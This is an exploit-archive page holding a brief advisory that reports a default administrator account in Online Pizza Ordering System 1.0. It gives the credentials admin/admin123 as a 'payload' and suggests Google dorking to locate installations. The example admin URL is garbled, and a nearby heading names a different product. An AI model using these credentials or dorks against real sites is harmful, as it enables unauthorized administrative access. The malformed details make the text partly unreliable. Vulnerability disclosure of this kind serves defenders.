*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Sports Complex Booking System 1.0 Insecure Settings

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

**Online Pizza Ordering System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ea183be601d90798e6a525ee32f1811b36b16ef45e82b7172ff7fd9dada60b8e

Download | Favorite | View

**Online Pizza Ordering System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Pizza Ordering System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Tag

#debian